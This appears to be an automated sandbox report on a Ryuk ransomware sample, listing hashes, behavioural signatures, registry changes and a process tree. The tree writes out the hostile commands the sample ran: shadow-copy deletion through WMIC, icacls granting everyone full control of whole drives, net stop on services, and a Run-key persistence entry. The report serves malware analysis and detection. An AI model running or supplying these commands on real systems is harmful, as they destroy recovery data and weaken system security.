Analysis
-
max time kernel
175s -
max time network
174s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
20-02-2022 08:42
Static task
static1
Behavioral task
behavioral1
Sample
320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
Resource
win10v2004-en-20220112
General
-
Target
320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe
-
Size
190KB
-
MD5
ffef678beca8ee60200bc88809d89630
-
SHA1
b31070af1ac3e088dfc6f1599f8d12edb1b16783
-
SHA256
320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689
-
SHA512
54298098a866e24d99e3764154ae3ca4481e9163fd6e9e0d2c27d7978065a38da38accd58268c985b4ed0cfd4c11a27f4fa51e815c2d7a15e3ec18c453df89c3
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RyukReadMe.html
ryuk
Extracted
C:\RyukReadMe.html
ryuk
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Executes dropped EXE 1 IoCs
Processes:
xCQauhX.exepid process 1580 xCQauhX.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exexCQauhX.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation xCQauhX.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exepid process 1276 icacls.exe 2304 icacls.exe 3748 icacls.exe 1872 icacls.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe" reg.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 49 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4116" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4292" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "7.363589" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "2.068267" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132899994038151645" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" svchost.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exexCQauhX.exepid process 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe 1580 xCQauhX.exe 1580 xCQauhX.exe 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exexCQauhX.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe Token: SeBackupPrivilege 1580 xCQauhX.exe Token: SeBackupPrivilege 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe Token: SeIncreaseQuotaPrivilege 1188 WMIC.exe Token: SeSecurityPrivilege 1188 WMIC.exe Token: SeTakeOwnershipPrivilege 1188 WMIC.exe Token: SeLoadDriverPrivilege 1188 WMIC.exe Token: SeSystemProfilePrivilege 1188 WMIC.exe Token: SeSystemtimePrivilege 1188 WMIC.exe Token: SeProfSingleProcessPrivilege 1188 WMIC.exe Token: SeIncBasePriorityPrivilege 1188 WMIC.exe Token: SeCreatePagefilePrivilege 1188 WMIC.exe Token: SeBackupPrivilege 1188 WMIC.exe Token: SeRestorePrivilege 1188 WMIC.exe Token: SeShutdownPrivilege 1188 WMIC.exe Token: SeDebugPrivilege 1188 WMIC.exe Token: SeSystemEnvironmentPrivilege 1188 WMIC.exe Token: SeRemoteShutdownPrivilege 1188 WMIC.exe Token: SeUndockPrivilege 1188 WMIC.exe Token: SeManageVolumePrivilege 1188 WMIC.exe Token: 33 1188 WMIC.exe Token: 34 1188 WMIC.exe Token: 35 1188 WMIC.exe Token: 36 1188 WMIC.exe Token: SeIncreaseQuotaPrivilege 4376 WMIC.exe Token: SeSecurityPrivilege 4376 WMIC.exe Token: SeTakeOwnershipPrivilege 4376 WMIC.exe Token: SeLoadDriverPrivilege 4376 WMIC.exe Token: SeSystemProfilePrivilege 4376 WMIC.exe Token: SeSystemtimePrivilege 4376 WMIC.exe Token: SeProfSingleProcessPrivilege 4376 WMIC.exe Token: SeIncBasePriorityPrivilege 4376 WMIC.exe Token: SeCreatePagefilePrivilege 4376 WMIC.exe Token: SeBackupPrivilege 4376 WMIC.exe Token: SeRestorePrivilege 4376 WMIC.exe Token: SeShutdownPrivilege 4376 WMIC.exe Token: SeDebugPrivilege 4376 WMIC.exe Token: SeSystemEnvironmentPrivilege 4376 WMIC.exe Token: SeRemoteShutdownPrivilege 4376 WMIC.exe Token: SeUndockPrivilege 4376 WMIC.exe Token: SeManageVolumePrivilege 4376 WMIC.exe Token: 33 4376 WMIC.exe Token: 34 4376 WMIC.exe Token: 35 4376 WMIC.exe Token: 36 4376 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exenet.exenet.exexCQauhX.exenet.exenet.execmd.exedescription pid process target process PID 3808 wrote to memory of 1580 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe xCQauhX.exe PID 3808 wrote to memory of 1580 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe xCQauhX.exe PID 3808 wrote to memory of 1580 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe xCQauhX.exe PID 3808 wrote to memory of 2228 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe sihost.exe PID 3808 wrote to memory of 2244 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe svchost.exe PID 3808 wrote to memory of 2296 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe taskhostw.exe PID 3808 wrote to memory of 2528 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe svchost.exe PID 3808 wrote to memory of 2744 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe DllHost.exe PID 3808 wrote to memory of 2904 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe StartMenuExperienceHost.exe PID 3808 wrote to memory of 2984 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe RuntimeBroker.exe PID 3808 wrote to memory of 3064 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe SearchApp.exe PID 3808 wrote to memory of 2628 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe RuntimeBroker.exe PID 3808 wrote to memory of 4068 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 4068 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 4068 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 1780 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 1780 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 1780 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 3324 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe RuntimeBroker.exe PID 3808 wrote to memory of 2572 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe RuntimeBroker.exe PID 4068 wrote to memory of 1860 4068 net.exe net1.exe PID 4068 wrote to memory of 1860 4068 net.exe net1.exe PID 4068 wrote to memory of 1860 4068 net.exe net1.exe PID 1780 wrote to memory of 1052 1780 net.exe net1.exe PID 1780 wrote to memory of 1052 1780 net.exe net1.exe PID 1780 wrote to memory of 1052 1780 net.exe net1.exe PID 3808 wrote to memory of 408 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe backgroundTaskHost.exe PID 1580 wrote to memory of 1872 1580 xCQauhX.exe icacls.exe PID 1580 wrote to memory of 1872 1580 xCQauhX.exe icacls.exe PID 1580 wrote to memory of 1872 1580 xCQauhX.exe icacls.exe PID 1580 wrote to memory of 1276 1580 xCQauhX.exe icacls.exe PID 1580 wrote to memory of 1276 1580 xCQauhX.exe icacls.exe PID 1580 wrote to memory of 1276 1580 xCQauhX.exe icacls.exe PID 1580 wrote to memory of 3904 1580 xCQauhX.exe cmd.exe PID 1580 wrote to memory of 3904 1580 xCQauhX.exe cmd.exe PID 1580 wrote to memory of 3904 1580 xCQauhX.exe cmd.exe PID 1580 wrote to memory of 2268 1580 xCQauhX.exe net.exe PID 1580 wrote to memory of 2268 1580 xCQauhX.exe net.exe PID 1580 wrote to memory of 2268 1580 xCQauhX.exe net.exe PID 2268 wrote to memory of 3464 2268 net.exe net1.exe PID 2268 wrote to memory of 3464 2268 net.exe net1.exe PID 2268 wrote to memory of 3464 2268 net.exe net1.exe PID 1580 wrote to memory of 1404 1580 xCQauhX.exe net.exe PID 1580 wrote to memory of 1404 1580 xCQauhX.exe net.exe PID 1580 wrote to memory of 1404 1580 xCQauhX.exe net.exe PID 1404 wrote to memory of 3120 1404 net.exe net1.exe PID 1404 wrote to memory of 3120 1404 net.exe net1.exe PID 1404 wrote to memory of 3120 1404 net.exe net1.exe PID 3904 wrote to memory of 1188 3904 cmd.exe WMIC.exe PID 3904 wrote to memory of 1188 3904 cmd.exe WMIC.exe PID 3904 wrote to memory of 1188 3904 cmd.exe WMIC.exe PID 3808 wrote to memory of 2304 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe icacls.exe PID 3808 wrote to memory of 2304 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe icacls.exe PID 3808 wrote to memory of 2304 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe icacls.exe PID 3808 wrote to memory of 3748 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe icacls.exe PID 3808 wrote to memory of 3748 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe icacls.exe PID 3808 wrote to memory of 3748 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe icacls.exe PID 3808 wrote to memory of 3308 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe cmd.exe PID 3808 wrote to memory of 3308 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe cmd.exe PID 3808 wrote to memory of 3308 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe cmd.exe PID 3808 wrote to memory of 3608 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 3608 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 3608 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe net.exe PID 3808 wrote to memory of 3232 3808 320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe cmd.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2228
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup1⤵PID:2244
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2744
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:2904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p1⤵PID:2528
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2984
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3064
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2628
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2572
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3324
-
C:\Users\Admin\AppData\Local\Temp\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe"C:\Users\Admin\AppData\Local\Temp\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Users\Admin\AppData\Local\Temp\xCQauhX.exe"C:\Users\Admin\AppData\Local\Temp\xCQauhX.exe" 8 LAN2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:1872 -
C:\Windows\SysWOW64\icacls.exeicacls "D:\*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:1276 -
C:\Windows\SysWOW64\cmd.execmd /c "WMIC.exe shadowcopy delet"3⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC.exe shadowcopy delet4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1188 -
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y3⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y4⤵PID:3464
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y3⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y4⤵PID:3120
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\xCQauhX.exe" /f /reg:643⤵PID:4440
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:1860
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:1052
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2304 -
C:\Windows\SysWOW64\cmd.execmd /c "WMIC.exe shadowcopy delet"2⤵PID:3308
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC.exe shadowcopy delet3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Windows\SysWOW64\icacls.exeicacls "D:\*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3748 -
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵PID:3608
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:4320
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe" /f /reg:642⤵PID:3232
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\320c98a9fd479c43fde9d3773a9eccd58e6cc63d1ba93343222c0b565460d689.exe" /f /reg:643⤵
- Adds Run key to start application
PID:4464 -
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵PID:4248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:4352
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1904
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\08e575673cce10c72090304839888e02_0d751396-3164-4736-b931-4f59d47ff1f2
MD593a5aadeec082ffc1bca5aa27af70f52
SHA147a92aee3ea4d1c1954ed4da9f86dd79d9277d31
SHA256a1a21799e98f97f271657ce656076f33dcb020d9370f1f2671d783cafd230294
SHA512df388c8d83e779e006d6311b2046fcf9259ec33d379fc0e2c6a4b6b90418f587a12c5c23acd488413a02568ca2d3effe04608ec7c791925c7ed53dc71093ca45
-
MD5
bff5fb0064af3544d547b5a15c5ff617
SHA18655be3a67bbecc340e0bc6fe77a384c496d6372
SHA256f5f1c97c80a49f207ad91262d6d9ba25212b41776157304bb9488d20ea4b5bf2
SHA512ac88b7a3f5135d6baf835cb42ea43485cb475903817b0ca855bd00bbce2ccf4455282a3c11a1df456e1d2e680c02b31bdb6df583c2845a02c48813c805cc10d3
-
MD5
eca0ea643cc1d7235f749a1c5f33b8ea
SHA18cf3303534e8c9d1543032cd43c404ac3ce71150
SHA25616b88815ad00b93638c9b1a13bd9c7065af2e9023c5fcaf9e04da7d6858a92b9
SHA5122a29ec1b990518780538b5f7a125667df2e5a4ee7ce5748c9aaab04ae14b624f440aade2aa8c3636246364098c46206f5342f02ea1cc987663f4bae6e3c37047
-
MD5
bff5fb0064af3544d547b5a15c5ff617
SHA18655be3a67bbecc340e0bc6fe77a384c496d6372
